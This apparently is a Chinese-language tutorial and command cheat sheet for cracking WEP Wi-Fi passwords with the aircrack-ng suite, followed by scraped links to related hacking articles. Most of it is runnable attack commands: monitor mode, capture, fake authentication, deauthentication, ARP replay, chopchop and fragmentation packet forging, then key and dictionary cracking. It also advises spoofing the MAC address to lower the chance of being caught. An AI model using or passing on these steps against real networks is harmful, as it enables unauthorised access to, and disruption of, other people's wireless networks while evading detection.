Aircrack-ng


工具主要有
  airmon-ng 处理网卡工作模式
  airodump-ng 抓包
  aircrack-ng 破解
  aireplay-ng 发包,干扰
  另外还要用到以下 linux 命令:
  ifconfig 查看修改网卡状态和参数
  macchanger 伪造 MAC
  iwconfig 主要针对无线网卡的工具 (同 ifconfig)
  iwlist 获取无线网络的更详细信息
  
具体破解步骤
  1. 修改无线网卡状态: down
  2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
  3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
  4. 修改无线网卡状态: up
  5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
  6. 监听抓包:生成 .cap 或 .ivs
  7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
  8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解

Crack Mode一共有5种
  airmon-ng start wlan0
  airodump-ng --ivs -w (目标路由器IVS文件) -c 6 mon0
  airodump-ng mon0

crack mode
  1)

  aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC mon0

  2)
  aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC mon0
    3)
  aireplay-ng -3 -b 目标MAC -h 本机MAC mon0
  4)
  aireplay-ng -4 -b 目标MAC -h 本机MAC mon0
  packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
  aireplay-ng -2 -r MyArp -x 256 mon0
  5)
  aireplay-ng -5 -b 目标MAC -h 本机MACmon0
  packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
  aireplay-ng -2 -r MyArp -x 256 mon0

Crack Key
  aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs

命令的基本用法

ifconfig

  用来配置网卡,我们这里主要用来 禁用和启用 网卡:

  ifconfig mon0 down

  ifconfig mon0 up

  禁用一下网卡的目的是为了下一步修改 MAC 。

macchanger

  用来改变网卡的 MAC 地址,具体用法如下:

  useage: macchanger [options] device

  -h 显示帮助

  -V 显示版本

  -s 显示当前MAC

  -e 不改变mac,使用硬件厂商写入的MAC

  -a 自动生成一个同类型的MAC,同厂商的

  -A 自动生成一个不同类型的MAC,不同厂商的

  -r 生成任意MAC

  -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

  -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 mon0 。

airmon-ng

  启动无线网卡进入 Monitor 模式,

  useage: airmon-ng <start|stop|check> <interface> [channel]

  <start|stop|check>启动,停止,检测

  <interface>指定无线网卡

  [channel] 监听频道

iwconfig

  专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

  useage:iwconfig interface [options]

  [essid{NN|ON|OFF}] 指定essid号 开启关闭

  [nwid{NN|on|off}] 指定网络id号 开启关闭

  [mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型

  [freq N.NNNN[K|M|G]] 指定工作频率

  [channel N] 指定频道

  [ap {N|off|auto}] 指定AP号 关闭/自动

  [sens N] sens 号

  [nick N] nick 号

  [rate {N|auto|fixed}] 速率控制

  [rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

  [frag {N|auto|fixed|off}] 碎片控制

  [enc {NNNN-NNNN|off}] 范围

  [power {period N|timeout N}] 电源 频率/超时

  [retry {limit N|lifetime N}] 重试 限次/超时

  [txpower N{mw|dBm}] 功率 毫瓦/分贝

  [commit] 处理

iwlist

  主要用来显示无线网卡的一些附加信息,同上

  useage: iwlist [interface] options

  scanning 扫描

  frequency 频率

  channel 频道

  bitrate 速率

  rate 速率

  encryption 加密

  key 密钥

  power 电源

  txpower 功率

  ap ap

  accespoints ap

  peers 直连

  event 事件

airodump-ng

  useage: airodump-ng <options> <interface>[,<interface>,...]

  Options:

  --ivs :仅将抓取信息保存为 .ivs

  --gpsd :使用 GPSd

  --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

  -w :同 --write

  --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

  --update <secs> :显示更新延迟

  --showack :显示ack/cts/rts状态

  -h :隐藏已知的,配合上面的选项使用

  -f <msecs> :跳频时间

  --berlin <secs> :无数据包接收时延迟显示的时间,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.

  -r <file> :从指定的文件读取数据包.

  Filter options:

  --encrypt <suite> : 使用密码序列过滤 AP

  --netmask <netmask> : 使用掩码过滤 AP

  --bssid <bssid> : 使用 bssid 过滤 AP

  -a : 过滤无关的客户端.

   默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

  --channel <channels>:指定频道

  --band <abg> :制定带宽

  -C <frequencies> :指定频率MHz

  --cswitch <method> : 设置频道交换方式

  0 : FIFO (default) 先进先出(默认)

  1 : Round Robin 循环

  2 : Hop on last 最后一跳

  -s : 同上

  --help : 显示使用方法

aireplay-ng

  useage: aireplay-ng <options> <replay interface>

  Filter options:

  -b bssid : AP的 MAC

  -d dmac : 目标的 MAC

  -s smac : 来源的 MAC

  -m len : 最小包长度

  -n len : 最大包长度

  -u type : 帧控制, type field

  -v subt : 帧控制, subtype field

  -t tods : 帧控制, To DS bit

  -f fromds : 帧控制, From DS bit

  -w iswep : 帧控制, WEP bit

  -D : 禁用 AP 发现功能

  Replay options:

  -x nbpps : 每秒包数量

  -p fctrl : 框架设定 (hex)

  -a bssid : 设置AP的 mac

  -c dmac : 设置目标的 MAC

  -h smac : 设置来源的 mac

  -g value : 改变环缓存大小 (默认8)

  -F : 选择第一个匹配的包

  Fakeauth attack options:

  -e essid : 设置目标 AP 的 SSID

  -o npckts : 每秒爆破的包数量 (0 自动, 默认 1)

  -q sec : 存活时间 秒

  -y prga : 共享可信的 key流

   Replay attack options:

  -j : 注入 fromDS 数据包

  Fragmentation attack options:

  -k IP : 设置目的IP 碎片

  -l IP : 设置源IP碎片

  Test attack options:

  -B : 激活 bitrate 测试

  source options:

  -i iface : 设置抓包的接口设备

  -r file : 从pcap文件析取数据包

  attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方

  --deauth count : 不信任一切 (-0)

  --fakeauth delay : 欺骗AP的信任 (-1)

  --interactive : 交互的选择 (-2)

  --arpreplay : 标准的 ARP欺骗原理-request replay (-3)

  --chopchop : 解密 WEP 包 (-4)

  --fragment : 生成有效的 key流 (-5)

  --caffe-latte : 从客户端获取新的 IVs (-6)

  --cfrag : 对客户端进行碎片攻击 (-7)

  --test : 测试注射及效果 (-9)

  --help : 显示帮助

aircrack-ng

  useage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

  -a <amode> : 暴破 (1/WEP, 2/WPA-PSK)

  -e <essid> : 选择 essid 为目标

  -b <bssid> : 选择 ap的 mac 为目标

  -q : 使用安静模式,无数出模式

  -C <macs> : 将所有的 AP 合并为一个虚拟的

  Static WEP cracking options:

  -c : 仅搜索字母数字

  -t : 仅搜索二进制

  -h : 搜索数字关键

  -d <mask> : 指定掩码(A1:XX:CF:YY)

  -m <maddr> : 用 MAC 匹配可用的数据包

  -n <nbits> : WEP 长度 64/128/152/256/512

  -i <index> : WEP 索引(1 to 4), default: any

  -f <fudge> : 暴破强度默认2

  -k <korek> : 禁用一种破解方式 (1 to 17)

  -x or -x0 : 禁用最新关键字暴破

  -x1 : 使用最新关键字暴破 默认

  -x2 : 用最新两个字节暴破

  -y : 实验单线程模式

  -K : KoreK 攻击 (pre-PTW)

  -s : 显示为 ASCII

  -M <num> : 最大数量 ivs 使用

  -D : WEP 非隐蔽模式

  -P <num> : PTW debug: 1 disable Klein, 2 PTW

  -1 : 尝试一次 PTW

  WEP and WPA-PSK cracking options:

  -w <words> : 指定目录文件,可以多个

  -r <DB> : 制定 airolib-ng 数据库,不能和 -w 一起使用

  --help : 帮助

实例

  

  ifconfig mon0 down

  macchanger -r mon0

  macchanger -r wlan0

  ifconfig mon0 up

  airmon-ng start mon0

  iwconfig mon0

  iwlist mon0 scanning

  airodump-ng -w *.cap -c 6 mon0

  aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX mon0 aireplay-ng -5 -b ap_mac -h XXXXXXXXXX mon0

  aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 mon0

  aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB mon0

  aireplay-ng -3 -b <AP MAC> -h <my MAC> -i mon0

  aircrack-ng -x -f 2 *.cap

  aircrack-ng -w passdict.txt *.cap

  aircrack-ng -n 64 -b apmac *.ivs

Linux:Aircrack-ng的更多相关文章

  1. 2017年最适用于WIFI HACK的无线网卡推荐

    http://www.freebuf.com/articles/wireless/140065.html 相信很多初次使用Kali Linux来进行无线渗透的小伙伴都曾遇到过一个非常头疼的问题,就是不 ...

  2. 适用于WIFI Hacking的无线网卡推荐

    相信很多初次使用Kali Linux来进行无线渗透的小伙伴都曾遇到过一个非常头疼的问题,就是不知道如何选购一款合适的无线网卡.因为Kali Linux并不是所有的网卡都支持,一旦选错了网卡不仅会给我们 ...

  3. 配置kali linux

    在7月底的时候,安全加介绍Fireeye出品的 免费恶意软件分析工具FlareVM,还可进行逆向工程和渗透测试 .今天是看到绿盟科技的一篇介绍Kali Linux配置的文章,这个工具也进入了 渗透测试 ...

  4. Kali Linux——迈向网络攻防

    自从进入大三的课程后,在已学的高数.线代.数论.概率论.信息论.通信等知识的技术上,开始了网络信息安全.网      络攻防的学习.俗话说得好,磨刀不误砍柴工,开始网络攻防之旅也势必要一个好的工具.然 ...

  5. linux下用crunch工具生成密码

    crunch是一款linux下的压缩后仅仅38k的小程序,crunch程序在2004年及以前由email为的作者编写mimayin@aciiid.ath.cx,后续版本由bofh28@gmail.co ...

  6. Linux 驱动开发

    linux驱动开发总结(一) 基础性总结 1, linux驱动一般分为3大类: * 字符设备 * 块设备 * 网络设备 2, 开发环境构建: * 交叉工具链构建 * NFS和tftp服务器安装 3, ...

  7. Android手机流量分析工具介绍

    一.20 Best Android Hacking Apps And Tools Of 2018 首先罗列常见的Android手机hacking的工具 #1The Android Network Ha ...

  8. crunch字典生成

    密码破解基本有三种方法:第一种是人工猜解(垃圾桶工程和被动信息收集): 第二种是基于字典暴力破解(主流) 在kali里,是默认自带了字典的,分别放在下面三个文件中:/usr/share/wordlis ...

  9. Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

    Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...

  10. kali linux wifi破解(aircrack)

    需要一个能监听的网卡 airmon-ng start wlan0(監聽網卡) airmon-ng check kill(清除其他有影响的環境) airodump-ng mon0 (掃描附近wifi) ...

随机推荐

  1. Centos下Nginx配置WEB访问日志并结合shell脚本定时切割

    在一个成熟的WEB系统里,没有日志管理是不可以的,有了日志,可以帮助你得到用户地域来源.跳转来源.使用终端.某个URL访问量等相关信息:通过错误日志,你可以得到系统某个服务或server的性能瓶颈等. ...

  2. 如何禁止ping

    PING命令是个危险的命令,用它可以知道你的操作系统,IP等,为了安全禁PING是个很好的方法,也是防DDOS攻击的.应该是有外部网络试图连接你的UDP的1434端口,不知道你打了补丁没有. 黑客入侵 ...

  3. 关于Linq的对List<实体>去掉重复ID的一个小例子!

    注意 下面的代码只要ID相同(即使其他的不相同)都会过滤掉,简单来讲就是过滤掉ID相同的实体,如果ID相同,其他属性取第一个的值 List<Abc> list = new List< ...

  4. Session管理之超时设置和强制下线

    关于Session,在Java Web开发中,为我们提供了很多方便,Session是由浏览器和服务器之间维护的.好吧,闲话不多说,下面让我们一步一步来实现它们. (一)首先来说下Session超时时间 ...

  5. 关于makefile的那些事儿

    最近越来越感觉到,在linux下面身为一个程序员,不会makefile就不是一个合格的程序员,所以今天我们介绍下常用的makefile编写. 了解知识: 编译:把高级语言书写的代码转换为机器可识别的机 ...

  6. 【前端】CSS3的calc()使用

    calc()对大家来说,或许很陌生,不太会相信calc()是css中的部分.因为看其外表像个函数,既然是函数为何又出现在CSS中呢?这一点也让我百思不得其解,今天有一同事告诉我,说CSS3中有一个属性 ...

  7. PigVar: THE PIG VARIATIONS AND POSITIVE SELECTION DATABASE

    URL: http://www.ibiomedical.net/ http://103.53.216.7/ Go to aldb database. (keywords: chicken, cow, ...

  8. vc libcurl 模拟上传文件

    http://www.cnblogs.com/killbit/p/5393301.html 附上这篇文章,因为当时就已经想到了模拟上传,但是因为时间关系,所以就直接用PHP写了.现在改进一下,用VC+ ...

  9. hdu 1241 搬寝室 水dp

    搬寝室 Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) Problem Desc ...

  10. Java新建线程的3种方法

    Java新建线程的3种方法 =================== Java创建线程有3种方法:(1)继承Thread;(2)实现Runnable接口:(3)实现Callable接口; 由于Java只 ...